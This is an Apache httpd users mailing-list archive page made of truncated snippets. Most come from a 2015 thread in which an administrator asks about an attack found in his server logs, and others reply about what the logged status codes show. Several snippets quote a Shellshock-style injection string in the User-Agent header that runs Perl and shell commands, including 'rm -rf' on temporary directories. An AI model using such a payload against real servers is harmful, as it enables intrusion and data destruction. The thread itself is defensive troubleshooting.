Re: [users@httpd] Security question

"sc.gif" was executed. On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote: I guess that the 200 comes from the fact that apache simply delivered the /index.html page. Or did you find that "sc.gif" was transferred and executed? Kurt Bremser AMOS Austria Newton was wrong. There is no gr

Re: [users@httpd] Security question

I guess that the 200 comes from the fact that apache simply delivered the /index.html page. Or did you find that "sc.gif" was transferred and executed? Kurt Bremser AMOS Austria Newton was wrong. There is no gravity. The Earth sucks. Von: Victor Sterpu [vic...@ca

Re: [users@httpd] Security question

On 02.07.2015 17:55, Kurtis Rader wrote: On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu > wrote: A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper

Re: [users@httpd] Security question

Yes. On 02.07.2015 21:16, David Grant wrote: Cgi module in php? Sent from my iPad On Jul 2, 2015, at 5:00 AM, Victor Sterpu wrote: Hello A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_

Re: [users@httpd] Security question

Cgi module in php? Sent from my iPad > On Jul 2, 2015, at 5:00 AM, Victor Sterpu wrote: > > Hello > > A hacker attacked a apache2 web server by HTTP injection. > The log show what he has done: > 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper > HTTP/1.1" 404 280 "-" "(

Re: [users@httpd] Security question

On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu wrote: > A hacker attacked a apache2 web server by HTTP injection. > The log show what he has done: > 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper > HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: > t

Re: [users@httpd] Security question

On Thu, Jul 2, 2015 at 8:29 AM, Victor Sterpu wrote: > In the end the attack was succesfull. Log show the last command: > 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" > "() { :;};/usr/bin/perl -e 'print \"Content-Type: > text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /

Re: [users@httpd] Security question

In the end the attack was succesfull. Log show the last command: 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; r

Re: [users@httpd] Security question

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful. - Y Sent from a gizmo with a very small keyboard and hyperactive autocorrect. On Jul 2, 2015 8:00 AM, "Victor Sterpu" wrote: > Hello

Re: [users@httpd] how to trace a proxypass directive

If the logs still don't say anything, check if LoadModule proxy*** and rewrite are in the config. Instead of ProxyPass, you can use a RewriteRule with the P flag and this one is also supposed to log lots of things. 2015-07-02 10:35 GMT+02:00 Daniel : > LogLevel warn proxy:trace3 for 2.4.x > Loglev

[users@httpd] Security question

Hello A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/

Re: [users@httpd] how to trace a proxypass directive

LogLevel warn proxy:trace3 for 2.4.x Loglevel debug for 2.2.x I would also make sure the proxypass directives are in the correct virtualhost, in case the requests are reaching another virtualhost different than the one where you defined the proxypass directives. Defining specific log files for dif